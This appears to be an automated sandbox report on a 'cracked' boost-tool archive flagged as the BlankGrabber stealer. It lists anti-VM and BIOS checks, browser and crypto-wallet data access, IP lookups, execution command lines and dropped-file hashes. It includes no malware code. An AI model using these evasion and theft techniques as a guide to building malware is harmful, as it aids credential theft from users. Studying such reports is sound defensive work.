Malware Analysis Report

2024-10-10 08:32

Sample ID 240620-j9tmmsxfqe
Target boostup_boost_tool_cracked.zip
SHA256 a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63
Tags
evasion trojan upx blankgrabber execution spyware stealer themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a87cd76b25f1927111bb0d8c81585861dc614dbb84612351b2d909aa5dd97f63

Threat Level: Known bad

The file boostup_boost_tool_cracked.zip was found to be: Known bad.

Malicious Activity Summary

evasion trojan upx blankgrabber execution spyware stealer themida

Blankgrabber family

A stealer written in Python and packaged with Pyinstaller

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Checks BIOS information in registry

UPX packed file

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks whether UAC is enabled

Looks up external IP address via web service

Enumerates physical storage devices

Unsigned PE

Kills process with taskkill

Suspicious use of SetWindowsHookEx

Detects videocard installed

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Gathers system information

Suspicious use of WriteProcessMemory

Enumerates processes with tasklist

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-20 08:22

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240220-en

Max time kernel

140s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\system32\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\rundll32.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\system32\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 2956 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2280 wrote to memory of 2956 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe
PID 2280 wrote to memory of 2956 N/A C:\Windows\system32\rundll32.exe C:\Windows\system32\WerFault.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2280 -s 116

Network

N/A

Files

memory/2280-1-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-4-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-0-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-2-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-3-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-5-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-6-0x0000000072E40000-0x000000007381F000-memory.dmp

memory/2280-7-0x0000000072E40000-0x000000007381F000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240221-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\loader.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI29522\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

memory/2124-24-0x000007FEF60D0000-0x000007FEF66B9000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240508-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_1700_133633453796928000\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\onefile_1700_133633453796928000\main.exe

MD5 49d08125658272ff5c325f8789b6e6ee
SHA1 33629d347573c8ae2c7f34fadf70cd91fdb4dcb2
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c
SHA512 68ba097ccc0d324ac9ec43f9ab3056e4c7d05519a69353994062b60ad44a0d31955a8845b5e4d2fdfa90b7646d552a30e56ec4746dae521fe05b74f248ce43f0

C:\Users\Admin\AppData\Local\Temp\onefile_1700_133633453796928000\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

memory/2772-42-0x000000013F1C0000-0x0000000141C86000-memory.dmp

memory/1700-46-0x000000013FCB0000-0x0000000141470000-memory.dmp

memory/1700-80-0x000000013FCB0000-0x0000000141470000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

52s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

Signatures

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\cmd.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\config.yml

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:22

Platform

win10v2004-20240508-en

Command Line

N/A

Signatures

N/A

Processes

N/A

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240508-en

Max time kernel

51s

Max time network

54s

Command Line

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api64.ipify.org N/A N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe

"C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\main.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "ver"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 api64.ipify.org udp

Files

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\python311.dll

MD5 65e381a0b1bc05f71c139b0c7a5b8eb2
SHA1 7c4a3adf21ebcee5405288fc81fc4be75019d472
SHA256 53a969094231b9032abe4148939ce08a3a4e4b30b0459fc7d90c89f65e8dcd4a
SHA512 4db465ef927dfb019ab6faec3a3538b0c3a8693ea3c2148fd16163bf31c03c899dfdf350c31457edf64e671e3cc3e46851f32f0f84b267535bebc4768ef53d39

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\main.exe

MD5 49d08125658272ff5c325f8789b6e6ee
SHA1 33629d347573c8ae2c7f34fadf70cd91fdb4dcb2
SHA256 fce000dc1908a48dec2c9b16d4ab4aca97bbefc0118a41fcd36a03228acaa40c
SHA512 68ba097ccc0d324ac9ec43f9ab3056e4c7d05519a69353994062b60ad44a0d31955a8845b5e4d2fdfa90b7646d552a30e56ec4746dae521fe05b74f248ce43f0

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\VCRUNTIME140.dll

MD5 4585a96cc4eef6aafd5e27ea09147dc6
SHA1 489cfff1b19abbec98fda26ac8958005e88dd0cb
SHA256 a8f950b4357ec12cfccddc9094cca56a3d5244b95e09ea6e9a746489f2d58736
SHA512 d78260c66331fe3029d2cc1b41a5d002ec651f2e3bbf55076d65839b5e3c6297955afd4d9ab8951fbdc9f929dbc65eb18b14b59bce1f2994318564eb4920f286

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\yaml\_yaml.pyd

MD5 e383f5064e9afe76cd25b49d00ffa275
SHA1 5073f97495ae0694bf79865852eda271a309f50f
SHA256 a0c62c035cd131ce1e574742d91d415de761a5c5d5c35a4f36a41b8e0b0ab195
SHA512 34c4b567c628d0c14f330dae8dd069b08940e087666666db9aa4497680f3111ab580f4ac702d726a7d6ab85fd4e9b27a952800a2b5271edb50374a30f15bc5b5

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ctypes.pyd

MD5 22c4892caf560a3ee28cf7f210711f9e
SHA1 b30520fadd882b667ecef3b4e5c05dc92e08b95a
SHA256 e28d4e46e5d10b5fdcf0292f91e8fd767e33473116247cd5d577e4554d7a4c0c
SHA512 edb86b3694fff0b05318decf7fc42c20c348c1523892cce7b89cc9c5ab62925261d4dd72d9f46c9b2bda5ac1e6b53060b8701318b064a286e84f817813960b19

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\tls_client\dependencies\tls-client-64.dll

MD5 6b0b5bb89d4fab802687372d828321b4
SHA1 a6681bee8702f7abbca891ac64f8c4fb7b35fbb5
SHA256 ec4f40c5f1ac709313b027c16face4d83e0dafdbc466cff2ff5d029d00600a20
SHA512 50c857f4a141ad7db8b6d519277033976bf97c9a7b490186a283403c05cb83b559a596efaf87ca46bc66bdf6b80636f4622324551c9de2c26bebfdbb02209d34

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\libffi-8.dll

MD5 0f8e4992ca92baaf54cc0b43aaccce21
SHA1 c7300975df267b1d6adcbac0ac93fd7b1ab49bd2
SHA256 eff52743773eb550fcc6ce3efc37c85724502233b6b002a35496d828bd7b280a
SHA512 6e1b223462dc124279bfca74fd2c66fe18b368ffbca540c84e82e0f5bcbea0e10cc243975574fa95ace437b9d8b03a446ed5ee0c9b1b094147cefaf704dfe978

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_hashlib.pyd

MD5 c888ecc8298c36d498ff8919cebdb4e6
SHA1 f904e1832b9d9614fa1b8f23853b3e8c878d649d
SHA256 21d59958e2ad1b944c4811a71e88de08c05c5ca07945192ab93da5065fac8926
SHA512 7161065608f34d6de32f2c70b7485c4ee38cd3a41ef68a1beacee78e4c5b525d0c1347f148862cf59abd9a4ad0026c2c2939736f4fc4c93e6393b3b53aa7c377

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\libcrypto-3.dll

MD5 51e8a5281c2092e45d8c97fbdbf39560
SHA1 c499c810ed83aaadce3b267807e593ec6b121211
SHA256 2a234b5aa20c3faecf725bbb54fb33f3d94543f78fa7045408e905593e49960a
SHA512 98b91719b0975cb38d3b3c7b6f820d184ef1b64d38ad8515be0b8b07730e2272376b9e51631fe9efd9b8a1709fea214cf3f77b34eeb9fd282eb09e395120e7cb

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_socket.pyd

MD5 2c0ec225e35a0377ac1d0777631bffe4
SHA1 7e5d81a06ff8317af52284aedccac6ebace5c390
SHA256 301c47c4016dac27811f04f4d7232f24852ef7675e9a4500f0601703ed8f06af
SHA512 aea9d34d9e93622b01e702defd437d397f0e7642bc5f9829754d59860b345bbde2dd6d7fe21cc1d0397ff0a9db4ecfe7c38b649d33c5c6f0ead233cb201a73e0

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\select.pyd

MD5 8472d39b9ee6051c961021d664c7447e
SHA1 b284e3566889359576d43e2e0e99d4acf068e4fb
SHA256 8a9a103bc417dede9f6946d9033487c410937e1761d93c358c1600b82f0a711f
SHA512 309f1ec491d9c39f4b319e7ce1abdedf11924301e4582d122e261e948705fb71a453fec34f63df9f9abe7f8cc2063a56cd2c2935418ab54be5596aadc2e90ad3

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_ssl.pyd

MD5 66e78727c2da15fd2aac56571cd57147
SHA1 e93c9a5e61db000dee0d921f55f8507539d2df3d
SHA256 4727b60962efacfd742dca21341a884160cf9fcf499b9afa3d9fdbcc93fb75d0
SHA512 a6881f9f5827aceb51957aaed4c53b69fcf836f60b9fc66eeb2ed84aed08437a9f0b35ea038d4b1e3c539e350d9d343f8a6782b017b10a2a5157649abbca9f9a

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_bz2.pyd

MD5 28ede9ce9484f078ac4e52592a8704c7
SHA1 bcf8d6fe9f42a68563b6ce964bdc615c119992d0
SHA256 403e76fe18515a5ea3227cf5f919aa2f32ac3233853c9fb71627f2251c554d09
SHA512 8c372f9f6c4d27f7ca9028c6034c17deb6e98cfef690733465c1b44bd212f363625d9c768f8e0bd4c781ddde34ee4316256203ed18fa709d120f56df3cca108b

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\_lzma.pyd

MD5 d386b7c4dcf589e026abfc7196cf1c4c
SHA1 c07ce47ce0e69d233c5bdd0bcac507057d04b2d4
SHA256 ad0440ca6998e18f5cc917d088af3fea2c0ff0febce2b5e2b6c0f1370f6e87b1
SHA512 78d79e2379761b054df1f9fd8c5b7de5c16b99af2d2de16a3d0ac5cb3f0bd522257579a49e91218b972a273db4981f046609fdcf2f31cf074724d544dac7d6c8

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_uuid.pyd

MD5 3a09b6db7e4d6ff0f74c292649e4ba96
SHA1 1a515f98946a4dccc50579cbcedf959017f3a23c
SHA256 fc09e40e569f472dd4ba2ea93da48220a6b0387ec62bb0f41f13ef8fab215413
SHA512 8d5ea9f7eee3d75f0673cc7821a94c50f753299128f3d623e7a9c262788c91c267827c859c5d46314a42310c27699af5cdfc6f7821dd38bf03c0b35873d9730f

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\unicodedata.pyd

MD5 57f8f40cf955561a5044ddffa4f2e144
SHA1 19218025bcae076529e49dde8c74f12e1b779279
SHA256 1a965c1904da88989468852fdc749b520cce46617b9190163c8df19345b59560
SHA512 db2a7a32e0b5bf0684a8c4d57a1d7df411d8eb1bc3828f44c95235dd3af40e50a198427350161dff2e79c07a82ef98e1536e0e013030a15bdf1116154f1d8338

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_queue.pyd

MD5 50842ce7fcb1950b672d8a31c892a5d1
SHA1 d84c69fa2110b860da71785d1dbe868bd1a8320f
SHA256 06c36ec0749d041e6957c3cd7d2d510628b6abe28cee8c9728412d9ce196a8a2
SHA512 c1e686c112b55ab0a5e639399bd6c1d7adfe6aedc847f07c708bee9f6f2876a1d8f41ede9d5e5a88ac8a9fbb9f1029a93a83d1126619874e33d09c5a5e45a50d

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_overlapped.pyd

MD5 d3be208dc5388225162b6f88ff1d4386
SHA1 8effdb606b6771d5fdf83145de0f289e8ad83b69
SHA256 ce48969ebebdc620f4313eba2a6b6cda568b663c09d5478fa93826d401abe674
SHA512 9e1c3b37e51616687eecf1f7b945003f6eb4291d8794fea5545b4a84c636007eb781c18f6436039df02a902223ac73efac9b2e44ddc8594db62feb9997475da3

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\certifi\cacert.pem

MD5 78d9dd608305a97773574d1c0fb10b61
SHA1 9e177f31a3622ad71c3d403422c9a980e563fe32
SHA256 794d039ffdf277c047e26f2c7d58f81a5865d8a0eb7024a0fac1164fea4d27cf
SHA512 0c2d08747712ed227b4992f6f8f3cc21168627a79e81c6e860ee2b5f711af7f4387d3b71b390aa70a13661fc82806cc77af8ab1e8a8df82ad15e29e05fa911bf

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_asyncio.pyd

MD5 cee78dc603d57cb2117e03b2c0813d84
SHA1 095c98ca409e364b8755dc9cfd12e6791bf6e2b8
SHA256 6306be660d87ffb2271dd5d783ee32e735a792556e0b5bd672dc0b1c206fdadc
SHA512 7258560aa557e3e211bb9580add604b5191c769594e17800b2793239df45225a82ce440a6b9dcf3f2228ed84712912affe9bf0b70b16498489832df2dee33e7e

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\websockets\speedups.pyd

MD5 99480b51453f6f78ee60954cac18454d
SHA1 4cb835152039ffcbd398f8b24fed39aae92566ed
SHA256 ebd0130532db4ea3ecb1d52a85d166714c0cd2817145e4d2616e780c6614bc43
SHA512 2b35860408dda6eb9e9ae6900e46bc2ea05e2338b62de2f484ee1b86135da4e0a849cba6bae28a52771692e54bd4779cbd69343edb13d70b387f44d7ed0aed73

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\_decimal.pyd

MD5 baaa9067639597e63b55794a757ddeff
SHA1 e8dd6b03ebef0b0a709e6cccff0e9f33c5142304
SHA256 6cd52b65e11839f417b212ba5a39f182b0151a711ebc7629dc260b532391db72
SHA512 7995c3b818764ad88db82148ea0ce560a0bbe9594ca333671b4c5e5c949f5932210edbd63d4a0e0dc2daf24737b99318e3d5daaee32a5478399a6aa1b9ee3719

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\libssl-3.dll

MD5 bfc834bb2310ddf01be9ad9cff7c2a41
SHA1 fb1d601b4fcb29ff1b13b0d2ed7119bd0472205c
SHA256 41ad1a04ca27a7959579e87fbbda87c93099616a64a0e66260c983381c5570d1
SHA512 6af473c7c0997f2847ebe7cee8ef67cd682dee41720d4f268964330b449ba71398fda8954524f9a97cc4cdf9893b8bdc7a1cf40e9e45a73f4f35a37f31c6a9c3

memory/3664-83-0x00007FF7903A0000-0x00007FF791B60000-memory.dmp

memory/3372-85-0x00007FFE88970000-0x00007FFE898FC000-memory.dmp

memory/3372-84-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\zstandard\backend_c.pyd

MD5 baf4db7977e04eca7e4151da57dc35d6
SHA1 80c70496375037ca084365e392d903dea962566c
SHA256 1a2ec2389c1111d3992c788b58282aaf1fc877b665b195847faf58264bf9bc33
SHA512 9b04f24ee61efa685c3af3e05000206384ec531a120209288f8fdc4fb1ec186c946fd59e9eb7381e9077bfbcfc7168b86a71c12d06529e70a7f30e44658a4950

C:\Users\Admin\AppData\Local\Temp\ONEFIL~1\win32security.pyd

MD5 0007e4004ee357b3242e446aad090d27
SHA1 4a26e091ca095699e6d7ecc6a6bfbb52e8135059
SHA256 10882e7945becf3e8f574b61d0209dd7442efd18ab33e95dceececc34148ab32
SHA512 170fa5971f201a18183437fc9e97dcd5b11546909d2e47860a62c10bff513e2509cb4082b728e762f1357145df84dcee1797133225536bd15fc87b2345659858

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\charset_normalizer\md__mypyc.pyd

MD5 f4192b63f194d4b4e420e319f08fd398
SHA1 03e2f59492e05f899cb5399a4971b3ee700f00c1
SHA256 0be6ce456259ec228b1e42b8406d6eecf4c9fc4c96b9c3dc6255695f539bfdca
SHA512 447f4909a742e3f2abbe37c2f02d1e9106ded7be5c1d3c1bcbe3985d61791c2eac85bfc9870518fb6d99c7bd32a73c99e9961b797aeee95756f59bf0d2038009

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\charset_normalizer\md.pyd

MD5 25e5dd43a30808f30857c6e46e6bc8df
SHA1 679cb7169813a9a0224f03624984645ea18aabe6
SHA256 62639a735008dd068142c0efca7f3d0f96f4959a52278fcf70012946e8552974
SHA512 904855da98f610a6ebe18ba76f7130a7f9a0ba5da0364fbc9ce79127728597c473aa85f8c0ccaf9f0af81da8f4e6ad7b722890839ee03f381e50177301661cc3

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\vcruntime140_1.dll

MD5 7e668ab8a78bd0118b94978d154c85bc
SHA1 dbac42a02a8d50639805174afd21d45f3c56e3a0
SHA256 e4b533a94e02c574780e4b333fcf0889f65ed00d39e32c0fbbda2116f185873f
SHA512 72bb41db17256141b06e2eaeb8fc65ad4abdb65e4b5f604c82b9e7e7f60050734137d602e0f853f1a38201515655b6982f2761ee0fa77c531aa58591c95f0032

C:\Users\Admin\AppData\Local\Temp\onefile_3664_133633453807017013\pywintypes311.dll

MD5 90b786dc6795d8ad0870e290349b5b52
SHA1 592c54e67cf5d2d884339e7a8d7a21e003e6482f
SHA256 89f2a5c6be1e70b3d895318fdd618506b8c0e9a63b6a1a4055dff4abdc89f18a
SHA512 c6e1dbf25d260c723a26c88ec027d40d47f5e28fc9eb2dbc72a88813a1d05c7f75616b31836b68b87df45c65eef6f3eaed2a9f9767f9e2f12c45f672c2116e72

memory/3372-99-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

memory/3372-102-0x00007FFE88970000-0x00007FFE898FC000-memory.dmp

memory/3372-101-0x00007FF66C9B0000-0x00007FF66F476000-memory.dmp

memory/3664-111-0x00007FF7903A0000-0x00007FF791B60000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win7-20240508-en

Max time kernel

118s

Max time network

120s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240508-en

Max time kernel

146s

Max time network

151s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked.zip

Network

Files

N/A

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-20 08:22

Reported

2024-06-20 08:25

Platform

win10v2004-20240611-en

Max time kernel

135s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Windows\system32\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\system32\rundll32.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Windows\system32\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\boostup_boost_tool_cracked\crack.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4248,i,3549704109630749084,1975543916261970610,262144 --variations-seed-version --mojo-platform-channel-handle=4092 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
